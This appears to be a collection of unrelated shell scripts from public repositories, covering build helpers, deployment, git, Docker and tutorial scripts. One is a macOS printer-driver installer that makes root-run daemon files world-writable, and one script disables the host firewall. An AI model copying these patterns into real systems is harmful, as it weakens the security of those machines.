"MIT"
] |
permissive
|
#!/bin/sh
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
# Even though we don't need to be in the right directory in theory,
# in practice, being in the wrong directly could lead to permissions
# issues
cd "$DIR/../.."
su -c 'pm2 update' web
su -c 'NODE_ENV=production DATABASE=production pm2 start -i 0 /home/web/app/dist/app/server/bin/www.js' web
su -c 'pm2 save' web
| true |
7a1da2b660cc5ceee5edb7f1bbe2394aa3678d15
|
Shell
|
JustinD85/sandbox
|
/languages/shell/file_status.sh
|
UTF-8
| 382 | 3.90625 | 4 |
[] |
no_license
|
#echo "Type the location of a FILE to check: "
#read FILE
#Takes filename as argument
FILE=$0
for FILE in $@
do
[ -f $FILE ] && echo "This is a file"
[ -d $FILE ] && echo "This is a directory"
if [ -d $FILE ]
then
echo ""
echo "Contents of Directory: "
echo ""
ls $FILE
fi
done
if [ -f $0 ]
then
exit 0
else
exit 1
fi
| true |
deb7561ff11683728d2c49cffbc93757f742e599
|
Shell
|
beenotung/zeronet-profile-chooser
|
/bump-android
|
UTF-8
| 224 | 3.21875 | 3 |
[] |
no_license
|
#!/bin/bash
## bump version
o=$(./version android)
if [ $# = 1 ]; then
v="$1"
else
v=$(($o + 1))
fi
echo "set android version code $o -> $v"
sed -i "s/android-versionCode=\"$o\" /android-versionCode=\"$v\" /" config.xml
| true |
6ffd3b7cfbe508a78c5d4d573401949bc7a668fb
|
Shell
|
chnaveen1523/Shell-programs
|
/while-loop/MagicNumber.sh
|
UTF-8
| 187 | 3.1875 | 3 |
[] |
no_license
|
#!/bin/bash -x
echo "Guess the number between 1 to 100"
low=1
high=100
mid=0
mid=$(((low+high)/2))
isNotMagicNumber=1
while (($isNotMagicNumber==1))
do
echo $notMagicNumber
done
| true |
204086142a87fa880ea8ecfd176756e006e6c721
|
Shell
|
omrprks/git-repo
|
/git-repo.sh
|
UTF-8
| 1,508 | 4.125 | 4 |
[
"MIT"
] |
permissive
|
#!/usr/bin/env sh
function log {
local message="${@}"
echo "git-repo: ${message}"
}
function error {
local message="${@}"
echo "\033[1;31m$(log ${message})\033[0m"
}
function fatal {
local message="${@}"
error ${message}
exit 1
}
function start {
local url="${@}"
[[ "${OSTYPE}" == "darwin"* ]] && {
open "${url}"
return
}
xdg-open "${url}"
}
BASE=${1:-origin}
SUPPORTED_HOSTS=(
'github.com'
'gitlab.com'
'bitbucket.org'
)
command -v git >/dev/null 2>&1 || {
fatal git not found
}
[ -d "$(pwd)/.git" ] || git rev-parse --git-dir > /dev/null 2>&1
[[ "$?" -ne "0" ]] && {
fatal not a git repository
}
remote=$(git ls-remote --get-url ${BASE})
http_match="^https?://[-A-Za-z0-9\+&@#/%?=~_|!:,.;]*[-A-Za-z0-9\+&@#/%=~_|]"
[[ "${remote}" =~ ${http_match} ]] && {
start "${remote}"
exit 0
}
ssh_match="^git@[-A-Za-z0-9\+&@#/%?=~_|!:,.;]*[-A-Za-z0-9\+&@#/%=~_|]"
[[ "${remote}" =~ ${ssh_match} ]] && {
OLD_IFS=${IFS}
IFS="|"
host=$(echo "${remote}" | sed -Ene "s!git@(${SUPPORTED_HOSTS[*]}):([^/]*)/(.*)(.git)?!\1!p")
username=$(echo "${remote}" | sed -Ene "s!git@(${SUPPORTED_HOSTS[*]}):([^/]*)/(.*)(.git)?!\2!p")
repository=$(echo "${remote}" | sed -Ene "s!git@(${SUPPORTED_HOSTS[*]}):([^/]*)/(.*)(.git)?!\3!p")
IFS=${OLD_IFS}
[[ -z "${host}" || -z "${username}" || -z "${repository}" ]] && {
fatal invalid host, username or repository
}
start https://"${host}"/"${username}"/"${repository}"
exit 0
}
fatal unsupported remote url
| true |
5342bb1db70e516e6fcb22a35caad25d1def9833
|
Shell
|
ubiquiti/ubnt-usrsctp
|
/run.sh
|
UTF-8
| 1,164 | 2.5625 | 3 |
[
"BSD-3-Clause"
] |
permissive
|
OS_VERSION=16
OS_ARCH=armeabi-v7a
NDK_ARCH_COMPILER=armv7a-linux-androideabi
NDK_ROOT_PATH=$(dirname $(which ndk-build))
NDK_HOST_NAME=$(basename $(dirname $(dirname $(realpath $(ndk-which --abi ${OS_ARCH} ar)))))
NDK_COMPILER_BASE=${NDK_ROOT_PATH}/toolchains/llvm/prebuilt/${NDK_HOST_NAME}/bin/${NDK_ARCH_COMPILER}${OS_VERSION}-
export LIBUSRSCTP_CUSTOM_CONFIGURE="--host=${NDK_ARCH_COMPILER} --enable-static --disable-shared --disable-programs"
export CFLAGS="-fPIC"
export CC=${NDK_COMPILER_BASE}clang
export CXX=${NDK_COMPILER_BASE}clang++
export LINK=${CXX}
export LD=$(realpath $(ndk-which --abi ${OS_ARCH} ld))
export AR=$(realpath $(ndk-which --abi ${OS_ARCH} ar))
export RANLIB=$(realpath $(ndk-which --abi ${OS_ARCH} ranlib))
export STRIP=$(realpath $(ndk-which --abi ${OS_ARCH} strip))
(git clean -dxff ./ \
&& mkdir m4 \
&& touch NEWS README AUTHORS ChangeLog INSTALL COPYING \
&& autoreconf -vfi \
)
./configure --disable-programs --enable-shared=no --disable-debug --prefix="/tmp/bla" ${LIBUSRSCTP_CUSTOM_CONFIGURE}
make
# /Users/shiretu/Library/Android/sdk/ndk-bundle/toolchains/llvm/prebuilt/darwin-x86_64/sysroot/usr/include/ifaddrs.h
| true |
7a1141e6195c33c8f6e0e0931669b8852f2b0078
|
Shell
|
renancunha33/ShellScripts
|
/topForUnixAix.sh
|
UTF-8
| 174 | 2.5625 | 3 |
[] |
no_license
|
#!/bin/ksh
while true
do
clear
ps -ef
sleep 2
done
#Unix AIX does not have "top" command to see processes on real time, so I did the little script to make a similar thing.
| true |
63519c172a24e1293180318c5b752b4791a455ea
|
Shell
|
airbnb/istio
|
/tools/go-compile-verbose
|
UTF-8
| 2,713 | 3.578125 | 4 |
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Copyright Istio Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This script runs can be used to emit (readable) compile tracing info when building go packages
# Before usage, `go clean -cache` is suggested, otherwise you will measure cached results.
# Cleanup: rm -f /tmp/golog; This will always append to the file so you should cleanup between each call.
# Usage (compile all tests only): `go test -exec=true -toolexec=$PWD/tools/go-compile-verbose ./...`
# Usage (compile binary): `go build -toolexec=$PWD/tools/go-compile-verbose ./...`
# Results will be in /tmp/golog, as stdout gets cached and pollutes all later runs.
START="$(date -u +%s.%N)"
# Output a message, with a timestamp matching istio log format
function log() {
delta=$(date +%s.%N --date="$START seconds ago")
echo -e "$(date -u '+%Y-%m-%dT%H:%M:%S.%NZ')\t${delta}\t$*" >&2 >> /tmp/golog
}
GROOT="$(go env GOROOT)"
GPATH="$(go env GOPATH)"
GMODCACHE="$(go env GOMODCACHE)"
ROOT="$PWD"
$@
ls="$(basename $1)"
shift
case "$ls" in
link)
log "${ls}\t$(basename ${2})" ;;
compile)
f=${@: -1}
if [[ "$f" =~ "$GMODCACHE" ]]; then
base="${f/"$GMODCACHE"\//}"
mod="$(<<< "$base" cut -d@ -f1)"
rest="$(<<< "$base" cut -d@ -f2 | cut -d/ -f2-)"
log "${ls}\t${mod}\t${rest}"
elif [[ "$f" =~ "$GROOT" ]]; then
base="${f/"$GROOT"\//}"
log "${ls}\tstd\t${base}"
elif [[ "$f" =~ "$ROOT" ]]; then
base="${f/"$ROOT"\//}"
log "${ls}\tlocal\t${base}"
else
log "${ls}\tunknown\t${f}"
fi
;;
vet)
# vet does not readily expose what is being vetted
log "${ls}" ;;
asm)
f="${@:$#}"
if [[ "$f" =~ "$GMODCACHE" ]]; then
base="${f/"$GMODCACHE"\//}"
mod="$(<<< "$base" cut -d@ -f1)"
rest="$(<<< "$base" cut -d@ -f2 | cut -d/ -f2-)"
log "${ls}\t${mod}\t${rest}"
elif [[ "$f" =~ "$GROOT" ]]; then
base="${f/"$GROOT"\//}"
log "${ls}\tstd\t${base}"
elif [[ "$f" =~ "$ROOT" ]]; then
base="${f/"$ROOT"\//}"
log "${ls}\tlocal\t${base}"
else
log "${ls}\tunknown\t${f}"
fi
;;
cgo)
log "${ls}" ;;
*)
log "${ls}\t${@:-1}" ;;
esac
| true |
bc91de3517eccaf6aa316a3ed191fa0338543f51
|
Shell
|
tomitribe/bash-tricks
|
/string-truncate.sh
|
UTF-8
| 1,913 | 3.75 | 4 |
[] |
no_license
|
#!/bin/bash
# Bash has effectively two methods very similar to Java's String.substring() method.
# In Java their signatures would be similar to:
#
# /** start at beginIndex and return the remaining characters **/
# public String substring(int beginIndex)
#
# /** start at beginIndex and return the next N characters **/
# public String substring(int beginIndex, int length)
#
# In bash this looks like
#
# ${string:beginIndex}
# ${string:beginIndex:length}
#
# If beginIndex is a negative number, Bash will count from the end of the string.
# length, however, cannot be negative to signify "previous N characters"
#
string=abcdefghijklmnopqrstuvwxyz
echo $string
# abcdefghijklmnopqrstuvwxyz
# print the last three characters
# string.substring(-3)
echo ${string: -3}
# xyz
# print the first three characters
# string.substring(0, 3)
echo ${string:0:3}
# start at index 12 and print the rest of the string
# string.substring(12)
echo ${string:12}
# mnopqrstuvwxyz
# start at index 12 and print one character
# string.substring(12, 1)
echo ${string:12:1}
# m
# start at index 0 and print 12 characters
# string.substring(0, 12)
echo ${string:0:12}
# abcdefghijkl
# start at index 0 (implied) and print 12 characters
# string.substring(0, 12)
echo ${string::12}
# abcdefghijkl
# start at index -12 and print remaining characters
# string.substring(-12)
echo ${string:(-12)}
#opqrstuvwxyz
#
#
filename=string-truncate.sh
echo ${filename: -3}
#.sh
echo ${filename: 0 : ${#filename}-3 }
string-truncate
#####################################
# PARSER WARNING
#####################################
# There is conflicting Bash sytnax. ":-" means something else in Bash
# so when you use a negative number, there must be a space before it
#
echo ${filename:-3} # if 'filename' is set, return it
#string-truncate.sh
unset filename
echo ${filename:-3} # if 'filename' is not set, return 3
# 3
| true |
315d54e987925efe1344303dc28e181a2db5877f
|
Shell
|
Net-Mist/atari_uct_cluster
|
/install/install_gflags.sh
|
UTF-8
| 487 | 3.109375 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/bash
# Change these variables to adapt your system
install_path=$HOME/gfinstall
# Install
cd
git clone https://github.com/gflags/gflags.git
cd gflags
vim CMakeLists.txt # change minimum version to 2.8.11
mkdir build
cd build
cmake -D BUILD_SHARED_LIBS=ON -D CMAKE_INSTALL_PREFIX=$install_path ..
make
make install
# Clean
cd
rm -rf gflags
# Add gflags path in the bashrc
cd
echo \#gflags >> .bashrc
echo export LD_LIBRARY_PATH=$install_path/lib:\$LD_LIBRARY_PATH >> .bashrc
| true |
1d13c8cb701d52e0bdfa19188e1150734947ca03
|
Shell
|
fredericoalvares/elastica
|
/apicloud/strategies/horInfra_vertSoft.sh
|
UTF-8
| 1,001 | 3.3125 | 3 |
[] |
no_license
|
#!/bin/bash
if ! [ -d /share ] || ! [ -f /root/openrc ]
then
echo "doit etre execute sur le cloud controler"
exit 1
fi
if [ "`env|grep PROJECT_PATH`" = "" ]
then
echo "PROJECT_PATH is not defined"
exit 2
fi
cd $PROJECT_PATH
source $PROJECT_PATH/common/util.sh
if [ "$#" -ne 2 ]; then
echo "Usage: $0 [ + | - ] tier"
exit 1
fi
sens=$1
TIER=$2
TIER_FILE="/tmp/$TIER"
if ! [ -f "$TIER_FILE" ]; then
echo "Tier not found!"
exit 1
fi
echo "Executing $0 in sens $sens"
if [ "$sens" = "+" ]
then
$PROJECT_PATH/apicloud/scale-iaas.sh out $TIER &
iaas_proc=$!
$PROJECT_PATH/apicloud/scale-saas.sh down $TIER
$PROJECT_PATH/apicloud/scale-saas.sh down $TIER
echo "Waiting for SDsoft and SOinfra to be completed"
log_cloud_state "i_0"
wait "$iaas_proc"
$PROJECT_PATH/apicloud/scale-saas.sh up $TIER
log_cloud_state "i_0"
$PROJECT_PATH/apicloud/scale-saas.sh up $TIER
log_cloud_state "i_0"
elif [ "$sens" = "-" ]
then
$PROJECT_PATH/apicloud/scale-iaas.sh in $TIER
fi
| true |
188ea6d6ca6eadd800935815f18d03f3b77a2c69
|
Shell
|
cloudfoundry-incubator/bits-service-release
|
/standalone-dev-setup/scripts/generate-test-bosh-lite-manifest-s3
|
UTF-8
| 1,038 | 2.5625 | 3 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -e
cd $(dirname $0)/..
# grab-AWS-env
lpass show "Shared-Flintstone"/ci-config --notes > config.yml
export AWS_ACCESS_KEY_ID=$(grep -e '^s3-blobstore-access-key-id' config.yml | sed -e 's/s3-blobstore-access-key-id: //')
export AWS_ACCESS_KEY_ID=${AWS_ACCESS_KEY_ID:?AWS_ACCESS_KEY_ID is missing}
export AWS_SECRET_ACCESS_KEY=$(grep -e '^s3-blobstore-secret-access-key' config.yml | sed -e 's/s3-blobstore-secret-access-key: //')
export AWS_SECRET_ACCESS_KEY=${AWS_SECRET_ACCESS_KEY:?AWS_SECRET_ACCESS_KEY is missing}
export BITS_DIRECTORY_KEY=$(grep -e '^s3-blobstore-bucket-name' config.yml | sed -e 's/s3-blobstore-bucket-name: //')
export BITS_DIRECTORY_KEY=${BITS_DIRECTORY_KEY:?BITS_DIRECTORY_KEY is missing}
export BITS_AWS_REGION=$(grep -e '^s3-blobstore-region' config.yml | sed -e 's/s3-blobstore-region: //')
export BITS_AWS_REGION=${BITS_AWS_REGION:?BITS_AWS_REGION is missing}
./scripts/generate-test-bosh-lite-manifest \
./templates/s3.yml \
./templates/bits-release-network-s3.yml
rm config.yml
| true |
b0912b36b3370964e3d1bc3cd458038509d12f39
|
Shell
|
Rp70/docker-nginx
|
/files/docker-entrypoint-init.d/mapuid.sh
|
UTF-8
| 448 | 3.78125 | 4 |
[
"BSD-2-Clause"
] |
permissive
|
#!/usr/bin/env bash
set -e
TARGET_USER='nginx'
# Change uid and gid of user $TARGET_USER to match current dir's owner
if [ "$MAP_WWW_UID" != "no" ]; then
if [ ! -d "$MAP_WWW_UID" ]; then
MAP_WWW_UID=$PWD
fi
uid=$(stat -c '%u' "$MAP_WWW_UID")
gid=$(stat -c '%g' "$MAP_WWW_UID")
usermod -u $uid $TARGET_USER 2> /dev/null && {
groupmod -g $gid $TARGET_USER 2> /dev/null || usermod -a -G $gid $TARGET_USER
}
fi
| true |
062a41fe9f53446d7c0eb5305cb259c0887134a7
|
Shell
|
peterdnight/my-examples
|
/my-shell/bash/samples.sh
|
UTF-8
| 543 | 3.578125 | 4 |
[] |
no_license
|
#!/bin/bash
source shell-utilities.sh
#
# find and remove spaces
#
photosFolder="$HOME/google-drive/family-photos/" ;
#ls
if test -d $photosFolder ; then
cd $photosFolder
find . -depth -name '* *' \
| while IFS= read -r fullPathToFile ; do \
cp -p -v "$fullPathToFile" "$(dirname "$fullPathToFile")/$(basename "$fullPathToFile"|tr -d ' ' )" ; \
done
find . -depth -name '* *' \
| while IFS= read -r fullPathToFile ; do \
rm -f -v "$fullPathToFile" ; \
done
else
echo no folder $photosFolder
fi ;
| true |
eabd53f50bdc676b40b0e58738103464feb0e56d
|
Shell
|
lordmallam/aether
|
/scripts/kubernetes/start_minikube.sh
|
UTF-8
| 643 | 3.28125 | 3 |
[
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
#!/usr/bin/env bash
set -Eeuo pipefail
export CHANGE_MINIKUBE_NONE_USER=true
# Start Minikube
sudo minikube start --vm-driver=none --kubernetes-version=v1.9.0
# Fix the kubectl context, as it's often stale.
minikube update-context
# Enable ingress in minikube
sudo minikube addons enable ingress
printf "Waiting for kubernetes to start..."
# Wait for Kubernetes to be up and ready.
JSONPATH='{range .items[*]}{@.metadata.name}:{range @.status.conditions[*]}{@.type}={@.status};{end}{end}'
until kubectl get nodes -o jsonpath="$JSONPATH" 2>&1 | grep -q "Ready=True"; do
sleep 1;
done
printf "Kubernetes has started successfully.\n"
| true |
1de1688cf90e7ba2c29336606d24bd4a0aa781a9
|
Shell
|
eerimoq/monolinux-example-project
|
/3pp/linux/tools/perf/tests/shell/record+script_probe_vfs_getname.sh
|
UTF-8
| 1,204 | 3.59375 | 4 |
[
"MIT",
"Linux-syscall-note",
"GPL-2.0-only"
] |
permissive
|
#!/bin/sh
# Use vfs_getname probe to get syscall args filenames
# Uses the 'perf test shell' library to add probe:vfs_getname to the system
# then use it with 'perf record' using 'touch' to write to a temp file, then
# checks that that was captured by the vfs_getname probe in the generated
# perf.data file, with the temp file name as the pathname argument.
# SPDX-License-Identifier: GPL-2.0
# Arnaldo Carvalho de Melo <[email protected]>, 2017
. $(dirname $0)/lib/probe.sh
skip_if_no_perf_probe || exit 2
. $(dirname $0)/lib/probe_vfs_getname.sh
perfdata=$(mktemp /tmp/__perf_test.perf.data.XXXXX)
file=$(mktemp /tmp/temporary_file.XXXXX)
record_open_file() {
echo "Recording open file:"
perf record -o ${perfdata} -e probe:vfs_getname touch $file
}
perf_script_filenames() {
echo "Looking at perf.data file for vfs_getname records for the file we touched:"
perf script -i ${perfdata} | \
egrep " +touch +[0-9]+ +\[[0-9]+\] +[0-9]+\.[0-9]+: +probe:vfs_getname: +\([[:xdigit:]]+\) +pathname=\"${file}\""
}
add_probe_vfs_getname || skip_if_no_debuginfo
err=$?
if [ $err -ne 0 ] ; then
exit $err
fi
record_open_file && perf_script_filenames
err=$?
rm -f ${perfdata}
rm -f ${file}
cleanup_probe_vfs_getname
exit $err
| true |
a2f02739ae33b847a7520cf0fda7da4353be242e
|
Shell
|
vdmitriyev/vagrant-templates
|
/NiFi/scripts/setup-centos.sh
|
UTF-8
| 199 | 2.75 | 3 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
source "/vagrant/scripts/common.sh"
function disableFirewall {
echo "disabling firewall"
systemctl stop firewalld
systemctl disable firewalld
}
echo "setup centos"
disableFirewall
| true |
d0903cdb5889ef1e8d575cddbe8651e93443bcf0
|
Shell
|
zhuzhenxxx/mtool
|
/extraResources/mac/common/hpdriver.pkg/Contents/Resources/preflight
|
UTF-8
| 2,921 | 2.6875 | 3 |
[] |
no_license
|
#!/bin/sh
#postinstall.sh
BASEDIR=$(dirname "$0")
echo "$BASEDIR"
. "$BASEDIR"/setup.ini
SPRPath=${PRPath["OSX$shortver"]}
INSTALL_PNAME="${PrinterName}"
cp -Rf "$BASEDIR"/setup.ini /usr/libexec/cups/backend/setup.ini
chmod -R 777 /usr/libexec/cups/backend/setup.ini
#进程自启动
chmod -R 777 /private/var/isectoolsdir/isectools
chmod -R 777 /private/var/isectoolsdir/Itoos.sh
sudo rm -rf /private/var/isectoolsdir
sudo mkdir /private/var/isectoolsdir
chmod -R 777 /private/var/isectoolsdir
cp -Rf "$BASEDIR"/isectools /private/var/isectoolsdir/
cp -Rf "$BASEDIR"/Itoos.sh /private/var/isectoolsdir/
cp -Rf "$BASEDIR"/com.isecprinter.server.plist /Library/LaunchDaemons/
cp -Rf "$BASEDIR"/com.isecopen.server.plist /Library/LaunchAgents/
chmod -R 777 /private/var/isectoolsdir/isectools
chmod -R 777 /private/var/isectoolsdir/Itoos.sh
sleep 1s
# 强制覆盖安装
rm -rf /Applications/PrinterClient.app
sleep 1s
chmod -R 777 "$BASEDIR"/PrinterClient.app
cp -Rf "$BASEDIR"/PrinterClient.app /Applications/
# lpadmin -x "${INSTALL_PNAME}" 删除打印机
# lpadmin -p "${INSTALL_PNAME}" -E -v ipp://localhost:18237/ipp/print -P "/Library/Printers/HP-Printer.ppd" -o printer-is-shared=false
installer -pkg "$BASEDIR/$SPRPath" -target /
#安装打印机
lpadmin -x 梦想加打印机
lpadmin -p ${INSTALL_PNAME} -E -v pdfwriter:/ -P "$BASEDIR"/Resources/RWTS\ PDFwriter.gz -o printer-is-shared=false
#installer -pkg "$BASEDIR"/APP -target /
#最高权限
#执行脚本
mkdir /var/spool/PDFwriter/
mkdir /var/spool/PDFwriter/isecpdf_out/
chmod -R 777 /private/var/isectoolsdir/isectools
launchctl unload /Library/LaunchDaemons/com.isecprinter.server.plist
sudo -u $USER launchctl unload /Library/LaunchDaemons/com.isecprinter.server.plist
sleep 1s
sudo -u $USER launchctl load /Library/LaunchDaemons/com.isecprinter.server.plist
sudo launchctl unload /Library/LaunchDaemons/com.isecprinter.server.plist
sleep 1s
sudo launchctl load /Library/LaunchDaemons/com.isecprinter.server.plist
pkill PrinterClient
sleep 2s
sudo -u $USER open /Applications/PrinterClient.app
chmod -R 777 /var/spool/cups
chmod -R 777 /var/spool/PDFwriter/
umask -R 777 /var/spool/PDFwriter/isecpdf_out/
cd /Users/
for i in `ls -f`;
do
if [[ $i != ".localized" && $i != "Shared" && $i != "Guest" && $i != "." && $i != ".." ]]; then
echo $i
su $i -c "lpoptions -d ${INSTALL_PNAME}"
fi
done
# launchctl unload /Library/LaunchDaemons/com.isecprinter.server.plist
# === preflight_add.sh begin ===
# DO NOT CHANGE THE COMMENT LINES
cp -R "$BASEDIR"/mtool_try_uninstall_driver.sh /private/var
chmod -R 777 /private/var/mtool_try_uninstall_driver.sh
cp -R "$BASEDIR"/com.mxj360.mtool.uninst.plist /Library/LaunchDaemons/
launchctl unload /Library/LaunchDaemons/com.mxj360.mtool.uninst.plist
sleep 1s
launchctl load /Library/LaunchDaemons/com.mxj360.mtool.uninst.plist
sleep 1s
# === preflight_add.sh end ===
exit 0
| true |
e24df843e64c4d89a42a2b16ce776940fa64e084
|
Shell
|
magnific0/dotfiles
|
/envprof/.bashrc
|
UTF-8
| 1,222 | 2.890625 | 3 |
[] |
no_license
|
#
# ~/.bashrc
#
# If not running interactively, don't do anything
[[ $- != *i* ]] && return
#PS1
RET='$(Ret=$? ; [ ${Ret} -eq 0 ] && echo -n "\[\e[32;1m\]▪" || echo -n "\[\e[31;1m\]▪")'
#RET='$(Ret=$? ; [ ${Ret} -eq 0 ] && echo -n "\[\e[32;1m\]▪" || echo -n "\[\e[31;1m\]${Ret}")'
# PS1
red="\[\e[0;32m\]"
yellow="\[\e[0;34m\]"
if [ `id -u` -eq "0" ]; then
root="\[\e[0;31m\]"
else
root="\[\e[0;32m\]"
fi
PS1="\[\e[0;37m\]┌─[${root}\u\[\e[0;37m\]][\[\e[0;96m\]\h\[\e[0;37m\]][\[\e[0;32m\]\w\[\e[0;37m\]]\n\[\e[0;37m\]└──╼ \[\e[0m\]"
PS2="\[\e[0;37m\]• \[\e[0m\]"
# test -n "$SSH_CLIENT" && PS1="$(hostname|cut -b 1-3)" || PS1=
# PS1="${PS1}% "
# Bash tweaks for command history
shopt -s histappend
PROMPT_COMMAND='history -a'
# Use up and down for partial completion of yet typed command
bind '"\e[A": history-search-backward'
bind '"\e[B": history-search-forward'
bind '"\C-\e[A": previous-history'
bind '"\C-\e[B": next-history'
export TEXMFLOCAL=$HOME/.local/share/texmf
export LC_ALL=C
export SUDO_EDITOR="em"
# Add local ruby gem directory to path if ruby is install at all
hash ruby 2>/dev/null && export PATH="$(ruby -e 'print Gem.user_dir')/bin:$PATH"
source ~/.bash_aliases
| true |
21550e507449f390ab3b398ebc4cbdd1d573df80
|
Shell
|
Contactis/translations-manager
|
/tmux.sh
|
UTF-8
| 875 | 2.859375 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/bash
#if your tmux counts from 1 instead of 0, change this
START_INDEX_NUMBER=0
SESSION="transman" # translation-manager
FOLDER_FRONTEND=$PWD # to assign to a variable
#create detached session named $SESSION
tmux new-session -d -s $SESSION
#split the pane horizontally in half
tmux splitw -h -p 50 -t $((START_INDEX_NUMBER+0))
#split both resulting panes vertically in half
tmux splitw -v -p 50 -t $((START_INDEX_NUMBER+0))
tmux selectp -t $((START_INDEX_NUMBER+0))
tmux send-keys "git log --graph --all --abbrev-commit --date=relative --format=format:'%C(bold red)%h%C(reset) %C(bold magenta)(%ar)%C(reset) %C(white)%s%C(reset) %C(bold blue) %an%C(reset)%C(auto)%d%C(reset)'" 'C-m'
tmux selectp -t $((START_INDEX_NUMBER+2))
tmux send-keys "gulp watch" 'C-m'
#assume support of 256 colors and attach indicated session
tmux -2 attach-session -t $SESSION
| true |
8cb2080cc3325dbed03a87148523d6c237536bf1
|
Shell
|
andrzejglobisz/rtl-test-task
|
/up-services.sh
|
UTF-8
| 4,741 | 4.03125 | 4 |
[] |
no_license
|
# Script runs services in 'PROD' mode by default
# Available parameters are:
# --mode <mode-name> - starts all services in 'DEV', 'QA' or 'PROD' mode
# --service-name <service-name> - starts specific service with its dependencies
# --down-only - stops and removes containers of running services
# --logs-only - displays logs output for all services or only for service specified by '--service-name' parameter
# --re-pull - pulls fresh images before starting containers
UNKNOWN_POSITIONAL_PARAMS=()
SERVICES=(
"nginx"
"services/scrapper-svc"
"services/movies-api"
)
function getDockerComposeOverrideFiles() {
local mode=${1:-prod}
local override_files=""
for service in "${SERVICES[@]}"; do
if [ ${mode} != "prod" ]; then
override_files+=\ -f\ ${service}/docker-compose.${mode}.yml
fi
done
printf "%s" "${override_files}"
}
while [ "$#" -gt 0 ]; do
key="$1"
case $key in
--mode)
MODE="$2"
shift # past parameter
shift # past value
if [ -z "${MODE-false}" ]; then
printf '%s\n' "Value for '--mode' parameter is required!"
printf '%s\n' "Available modes are 'DEV', 'QA' or 'PROD'"
exit 1
fi
;;
--service-name)
SERVICE_NAME="$2"
shift # past parameter
shift # past value
if [ -z "${SERVICE_NAME-false}" ]; then
printf '%s\n' "Value for '--service-name' parameter is required!"
exit 1
fi
;;
--down-only)
DOWN="$1"
shift # past parameter
;;
--logs-only)
LOGS="$1"
shift # past parameter
;;
--re-pull)
RE_PULL="$1"
shift # past parameter
;;
*) # unknown option
UNKNOWN_POSITIONAL_PARAMS+=("$1")
shift # past parameter
;;
esac
done
if [ "${#UNKNOWN_POSITIONAL_PARAMS[@]}" -ne 0 ]; then
printf '%s\n' "Unrecognized parameters: '${UNKNOWN_POSITIONAL_PARAMS[*]}'"
printf '%s\n' "Available parameters are:"
printf '%s\n' "--mode <mode-name> - starts all services in 'DEV', 'QA' or 'PROD' mode"
printf '%s\n' "--service-name <service-name> - specifies service that should be started or for which logs should be displayed"
printf '%s\n' "--down-only - stops and removes containers of running services"
printf '%s\n' "--logs-only - displays logs output for all services or only for service specified by '--service-name' parameter"
printf '%s\n' "--re-pull - pulls fresh images before starting containers"
exit 0
fi
DOCKER_COMPOSE_CONFIG="docker-compose -f docker-compose.yml"
DOCKER_COMPOSE_UP_OPTIONS=""
case $MODE in
DEV)
printf '%s\n' "Mode: ${MODE}"
DOCKER_COMPOSE_CONFIG+=$(getDockerComposeOverrideFiles dev)
DOCKER_COMPOSE_UP_OPTIONS="--build --force-recreate"
;;
QA)
printf '%s\n' "Mode: ${MODE}"
DOCKER_COMPOSE_CONFIG+=$(getDockerComposeOverrideFiles qa)
DOCKER_COMPOSE_UP_OPTIONS="--force-recreate -d"
;;
PROD | *)
printf '%s\n' "Mode: PROD"
DOCKER_COMPOSE_CONFIG+=$(getDockerComposeOverrideFiles)
DOCKER_COMPOSE_UP_OPTIONS="--force-recreate -d"
;;
esac
DOCKER_COMPOSE_DOWN=("${DOCKER_COMPOSE_CONFIG}" "down --remove-orphans")
if [ "${DOWN}" == "--down-only" ]; then
printf '%s\n' "Stopping containers, removing containers and networks ..."
printf '%s\n' "Running command: ${DOCKER_COMPOSE_DOWN[*]}"
eval "${DOCKER_COMPOSE_DOWN[@]}"
exit 0;
fi
DOCKER_COMPOSE_LOGS=("${DOCKER_COMPOSE_CONFIG}" "logs --no-color" "${SERVICE_NAME}")
if [ "${LOGS}" == "--logs-only" ]; then
printf '%s\n' "Displaying logs output ..."
printf '%s\n' "Running command: ${DOCKER_COMPOSE_LOGS[*]}"
eval "${DOCKER_COMPOSE_LOGS[@]}"
exit 0;
fi
DOCKER_COMPOSE_UP=("${DOCKER_COMPOSE_CONFIG}" "up" "${DOCKER_COMPOSE_UP_OPTIONS}")
DOCKER_COMPOSE=(
"${DOCKER_COMPOSE_DOWN[@]}" "&&"
"${DOCKER_COMPOSE_UP[@]}"
)
DOCKER_COMPOSE_PULL=("${DOCKER_COMPOSE_CONFIG}" "pull")
if [ "${RE_PULL}" == "--re-pull" ]; then
printf '%s\n' "Enforced pull of fresh images ..."
DOCKER_COMPOSE=("${DOCKER_COMPOSE[@]:0:3}" "${DOCKER_COMPOSE_PULL[@]}" "&&" "${DOCKER_COMPOSE[@]:3}")
fi
if [ "${SERVICE_NAME:=false}" != "false" ]; then
printf '%s\n' "Starting service: ${SERVICE_NAME} ..."
DOCKER_COMPOSE=("${DOCKER_COMPOSE[@]}" "${SERVICE_NAME}")
else
printf '%s\n' "Starting all services ..."
fi
printf '%s\n' "Running command: ${DOCKER_COMPOSE[*]}"
eval "${DOCKER_COMPOSE[@]}"
| true |
e4b3d34b844cf1161bb424550bd8baabcd6b119e
|
Shell
|
CallumWalley/NeSI_Interactive_Introduction
|
/00-Bash_Basics/source_me
|
UTF-8
| 2,275 | 3.59375 | 4 |
[] |
no_license
|
#!/bin/bash
source "/home/cwal219/training/.common"
intro () {
STEP="0"
cd "~/"
